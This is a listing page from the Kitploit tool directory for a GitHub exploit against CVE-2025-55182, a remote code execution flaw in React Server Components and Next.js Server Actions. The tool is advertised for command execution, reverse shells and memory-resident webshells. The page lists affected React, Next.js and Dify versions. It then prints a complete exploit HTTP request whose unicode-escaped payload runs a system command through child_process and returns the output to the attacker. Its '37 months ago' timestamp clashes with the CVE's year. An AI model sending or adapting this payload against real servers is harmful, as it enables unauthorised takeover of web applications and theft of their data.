Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182 — CVE-2025-55182(命令执行、反弹shell、注入内存马) | Kitploit
Tools/GitHubGitHub/bbd-yzz/cve-2025-55182
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubbbd-yzz/cve-2025-55182

CVE-2025-55182

CVE-2025-55182(命令执行、反弹shell、注入内存马)

View Repository
37 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182

CVE-2025-55182

React Server Components Remote Code Execution (CVE-2025-55182) and Next.js Remote Code Execution (CVE-2025-66478). This vulnerability primarily affects the Server Actions functionality in react-server-dom-webpack. Due to missing security validation when parsing client-submitted forms, an attacker can craft a malicious form request to directly invoke Node.js built-in modules, thereby executing arbitrary system commands on the server, reading or writing arbitrary files, and even fully compromising the service. Additionally, because Next.js 15.x and 16.x rely on a flawed React server DOM package when using the App Router, attackers can also inject malicious code to execute remote commands.

Affected Versions

root@kitploit:~
React affected versions == 19.0.0
React affected versions == 19.0.1
React affected versions == 19.1.0
React affected versions == 19.2.0
react-server-dom-webpack affected versions == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel affected versions == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack affected versions == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
Next.js affected versions >= 14.3.0-canary.77
Next.js 15.0.0 <= affected versions < 15.0.5
Next.js 15.1.0 <= affected versions < 15.1.9
Next.js 15.2.0 <= affected versions < 15.2.6
Next.js 15.3.0 <= affected versions < 15.3.6
Next.js 15.4.0 <= affected versions < 15.4.8
Next.js 15.5.0 <= affected versions < 15.5.7
Next.js 16.0.0 <= affected versions < 16.0.7
Dify 1.1.2 <= affected versions < 1.10.1-fix.1

Tool Results

Image 1 Image 2 Image 3 Image 4

Reproduction Packet

root@kitploit:~
POST /c9436a490867 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 1755
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Next-Action: x
Connection: close

--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"\u0074\u0072\u0079\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u002e\u006d\u0061\u0069\u006e\u004d\u006f\u0064\u0075\u006c\u0065\u002e\u0072\u0065\u0071\u0075\u0069\u0072\u0065\u0028\u0027\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u0027\u0029\u002e\u0065\u0078\u0065\u0063\u0053\u0079\u006e\u0063\u0028\u0027\u0065\u0063\u0068\u006f\u0020\u0051\u0041\u0058\u004e\u0042\u0031\u0032\u0031\u0033\u0038\u0027\u0029\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0027\u0062\u0061\u0073\u0065\u0036\u0034\u0027\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0027\u0045\u0052\u0052\u004f\u0052\u0027\u003b\u0020\u007d\u0020\u0074\u0068\u0072\u006f\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u002e\u0061\u0073\u0073\u0069\u0067\u006e\u0028\u006e\u0065\u0077\u0020\u0045\u0072\u0072\u006f\u0072\u0028\u0027\u0078\u0027\u0029\u002c\u007b\u0064\u0069\u0067\u0065\u0073\u0074\u003a\u0072\u0065\u0073\u007d\u0029\u003b","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="1"

"$@0"
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="2"

[]
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd--
Download Tool